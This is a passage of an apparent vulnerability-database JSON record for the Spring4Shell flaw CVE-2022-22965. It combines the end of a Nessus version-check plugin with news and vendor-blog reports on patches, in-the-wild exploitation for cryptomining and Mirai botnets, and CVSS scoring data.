value:\"2022/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:primavera_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_primavera_gateway.nbin\");\n script_require_keys(\"installed_sw/Oracle Primavera Gateway\");\n script_require_ports(\"Services/www\", 8006);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nget_install_count(app_name:'Oracle Primavera Gateway', exit_if_zero:TRUE);\n\nvar port = get_http_port(default:8006);\n\nvar app_info = vcf::get_app_info(app:'Oracle Primavera Gateway', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nvar constraints = [\n { 'min_version' : '17.12.0', 'max_version' : '17.12.11.999999', 'fixed_display' : 'See vendor advisory'},\n { 'min_version' : '18.8.0', 'fixed_version' : '18.8.15' },\n { 'min_version' : '19.12.0', 'fixed_version' : '19.12.14' },\n { 'min_version' : '20.12.0', 'fixed_version' : '20.12.9' },\n { 'min_version' : '21.12.0', 'max_version': '21.12.1', 'fixed_version' : '21.12.7' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "The maintainers of Spring Framework have released an emergency patch to address a newly disclosed [remote code execution flaw](<https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html>) that, if successfully exploited, could allow an unauthenticated attacker to take control of a targeted system.\n\nTracked as [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), the high-severity flaw impacts Spring 
Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and other older, unsupported versions. Users are recommended to upgrade to versions 5.3.18 or later and 5.2.20 or later.\n\nThe Spring Framework is a Java framework that offers infrastructure support to develop web applications.\n\n\"The vulnerability impacts Spring [MVC](<https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller>) [model\u2013view\u2013controller] and Spring WebFlux applications running on [Java Development Kit] 9+,\" Rossen Stoyanchev of Spring.io [said](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) in an advisory published Thursday.\n\n\"The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e., the default, it is not vulnerable to the exploit,\" Stoyanchev added.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>).\n\nThat said, Spring.io warned that the \"nature of the vulnerability is more general\" and that there could be other ways to weaponize the flaw that has not come to light.\n\nThe patch arrives as a Chinese-speaking researcher briefly published a GitHub commit that contained proof-of-concept (PoC) exploit code for CVE-2022-22965 on March 30, 2022, before it was taken down.\n\nSpring.io, a subsidiary of VMware, noted that it was first alerted to the vulnerability \"late on Tuesday evening, close to midnight, GMT time by codeplutos, meizjm3i of AntGroup FG Security Lab.\" It also credited cybersecurity firm Praetorian for reporting the flaw.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:35:00", "type": "thn", "title": "Security Patch Releases for Critical Zero-Day Bug in Java Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T03:15:06", "id": "THN:7A3DFDA680FEA7FB77640D29F9D3E3E2", "href": "https://thehackernews.com/2022/03/security-patch-releases-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to 
mine cryptocurrency on Linux systems as part of an active malware campaign.\n\n\"It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,\" CrowdStrike [said](<https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/>) in a new report. \"It evades detection by targeting Alibaba Cloud's monitoring service and disabling it.\"\n\nKnown to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.\n\n\"It uses a wide range of spreading mechanisms \u2014 phishing emails, exploits, USB devices, brute force, among others \u2014 and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,\" Microsoft [detailed](<https://thehackernews.com/2021/07/microsoft-warns-of-lemonduck-malware.html>) in a technical write-up of the malware last July. 
\n\nIn early 2021, attack chains involving LemonDuck [leveraged](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) the then newly patched [Exchange Server vulnerabilities](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.\n\nThe latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using it to run a rogue container to retrieve a Bash shell script file that's disguised as a harmless PNG image file from a remote server.\n\nAn analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.\n\nThe dropper files are key to launching the attack, with the shell script downloading the actual payload that then kills competing processes, disables Alibaba Cloud's monitoring services, and finally downloads and runs the XMRig coin miner.\n\nWith [compromised cloud instances](<https://thehackernews.com/2021/11/hackers-using-compromised-google-cloud.html>) becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure containers from potential risks throughout the software supply chain.\n\n### TeamTNT targets AWS, Alibaba Cloud\n\nThe disclosure comes as Cisco Talos exposed the toolset of a cybercrime group named TeamTNT, which has a history of targeting cloud infrastructure for cryptojacking and placing 
backdoors.\n\nThe malware payloads, which are said to have been modified in response to [previous public disclosures](<https://www.trendmicro.com/en_us/research/21/c/teamtnt-continues-attack-on-the-cloud--targets-aws-credentials.html>), are primarily designed to target Amazon Web Services (AWS) while simultaneously focused on cryptocurrency mining, persistence, lateral movement, and disabling cloud security solutions.\n\n\"Cybercriminals who are outed by security researchers must update their tools in order to continue to operate successfully,\" Talos researcher Darin Smith [said](<https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html>).\n\n\"The tools used by TeamTNT demonstrate that cybercriminals are increasingly comfortable attacking modern environments such as Docker, Kubernetes, and public cloud providers, which have traditionally been avoided by other cybercriminals who have instead focused on on-premise or mobile environments.\"\n\n### Spring4Shell exploited for cryptocurrency mining\n\nThat's not all. 
In yet another instance of how threat actors quickly co-opt newly disclosed flaws into their attacks, the critical remote code execution bug in Spring Framework ([CVE-2022-22965](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>)) has been weaponized to deploy cryptocurrency miners.\n\nThe exploitation attempts make use of a custom web shell to deploy the cryptocurrency miners, but not before turning off the firewall and terminating other virtual currency miner processes.\n\n\"These cryptocurrency miners have the potential to affect a large number of users, especially since Spring is the most widely used framework for developing enterprise-level applications in Java,\" Trend Micro researchers Nitesh Surana and Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T09:30:00", "type": "thn", "title": "Watch Out! 
Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-22T09:30:49", "id": "THN:8FDA592D55831C1C4E3583B81FABA962", "href": "https://thehackernews.com/2022/04/watch-out-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "A threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). 
\"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. 
\n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:29", 
"description": "The recently disclosed critical **Spring4Shell** vulnerability is being actively exploited by threat actors to execute the [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) [botnet malware](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>), particularly in the Singapore region since the start of April 2022.\n\n\"The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using ['chmod](<https://en.wikipedia.org/wiki/Chmod>),'\" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html>) in a report published Friday.\n\nTracked as [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices.\n\nThe development comes as the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) earlier this week [added](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>) the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on \"evidence of active exploitation.\"\n\nThis is far from the first time the botnet operators have quickly moved to add newly publicized flaws to their exploit toolset. In December 2021, multiple botnets including Mirai and Kinsing were [uncovered](<https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts>) leveraging the [Log4Shell vulnerability](<https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html>) to breach susceptible servers on the internet. 
\n\n[Mirai](<https://en.wikipedia.org/wiki/Mirai_\\(malware\\)>), meaning \"future\" in Japanese, is the name given to a [Linux malware](<https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/>) that has continued to target connected smart home devices such as IP cameras and routers and link them together into a network of infected devices known as a botnet.\n\nThe IoT botnet, using the herd of hijacked hardware, can be then used to commit further attacks, including large-scale phishing attacks, cryptocurrency mining, click fraud, and distributed denial-of-service (DDoS) attacks.\n\nTo make matters worse, the leak of Mirai's source code in [October 2016](<https://thehackernews.com/2016/10/mirai-source-code-iot-botnet.html>) has given birth to [numerous variants](<https://thehackernews.com/2020/06/ddos-botnet-hacker-jailed.html>) such as Okiru, Satori, Masuta, and [Reaper](<https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/reaper-botnet/>), making it an ever-mutating threat.\n\n\"The [Mirai] code is so influential that even some of the malware offshoots are starting to have their own code versions released and co-opted by other cybercriminals,\" Intel 471 researchers [said](<https://intel471.com/blog/malware-source-code-leak-history>) last month, pointing out the upload of the [BotenaGo botnet's](<https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github>) source code on GitHub in January 2022.\n\nEarlier this January, cybersecurity firm CrowdStrike noted that malware hitting Linux systems increased by 35% in 2021 compared to 2020, with [XOR DDoS](<https://thehackernews.com/2020/06/cryptocurrency-docker-image.html>), Mirai, and [Mozi](<https://thehackernews.com/2021/09/chinese-authorities-arrest-hackers.html>) malware families accounting for more than 22% of Linux-targeted threats observed in the year.\n\n\"The primary purpose of these malware families is to compromise 
vulnerable internet-connected devices, amass them into botnets, and use them to perform distributed denial-of-service (DDoS) attacks,\" the researchers [said](<https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-09T05:18:00", "type": "thn", "title": "Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-14T04:20:56", "id": "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "href": "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:30", "description": 
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) based on \"evidence of active exploitation.\"\n\nThe critical severity flaw, assigned the identifier [CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>) (CVSS score: 9.8) and dubbed \"Spring4Shell\", impacts Spring model\u2013view\u2013controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman noted last week.\n\nAlthough exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard [said](<https://securityscorecard.com/blog/spring4shell-12-year-old-vulnerability-springs-back-to-life>) \"active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space.\"\n\nSimilar scanning activities have been spotted by [Akamai](<https://www.akamai.com/blog/security/spring-core-spring4shell-zero-day>) and Palo Alto Networks' [Unit42](<https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/>), with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target 
network.\n\n\"During the first four days after the vulnerability outbreak, 16% of the organizations worldwide were impacted by exploitation attempts,\" Check Point Research [said](<https://blog.checkpoint.com/2022/04/05/16-of-organizations-worldwide-impacted-by-spring4shell-zero-day-vulnerability-exploitation-attempts-since-outbreak/>), adding it detected 37,000 Spring4Shell-related attacks over the weekend.\n\nMicrosoft 365 Defender Threat Intelligence Team also [chimed in](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>), stating it has been \"tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities.\"\n\nAccording to [statistics](<https://www.sonatype.com/resources/springshell-exploit-resource-center>) released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.\n\nCisco, which is [actively investigating](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67>) its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected -\n\n * Cisco Crosswork Optimization Engine\n * Cisco Crosswork Zero Touch Provisioning (ZTP), and\n * Cisco Edge Intelligence\n\nVMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable -\n\n * VMware Tanzu Application Service for VMs\n * VMware Tanzu Operations Manager, and\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n\"A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2022-0010.html>) in the advisory.\n\nAlso added by 
CISA to the catalog are [two zero-day flaws](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the [Beastmode](<https://thehackernews.com/2022/04/beastmode-ddos-botnet-exploiting-new.html>) Mirai-based DDoS campaign.\n\nPursuant to the Binding Operational Directive (BOD) [issued](<https://www.cisa.gov/binding-operational-directive-22-01>) by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:31:00", "type": "thn", "title": "CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45382", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-22965"], "modified": "2022-04-06T03:27:40", "id": "THN:9F9D436651F16F99B6EA52F0DB9AE75C", "href": "https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2022-04-08T19:28:48", "description": "We discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T00:00:00", "type": "trendmicroblog", "title": "CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "TRENDMICROBLOG:3BBEDAD3D1AE692D361A31D5E9AE2538", "href": 
"https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T15:36:25", "description": "Recently, we observed attempts to exploit the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:59C3D813302731E6DE220FB088280F67", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:29:16", "description": "Recently, we observed the Spring4Shell vulnerability \u2014 a remote code 
execution bug, assigned as CVE-2022-22965 \u2014 being actively exploited by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:AFF0912EF635E2446F0D546515038F73", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-04-08T19:36:04", "description": "UPDATE, APRIL 4, 2022: The Kenna Risk Score for CVE-2022-22965 is currently at maximum 100. This is an exceptionally rare score, of which only 415 out of 184,000 CVEs (or 0.22 percent) have achieved, reflecting the severity and potential effects of this vulnerability. To get a risk score this high...", 
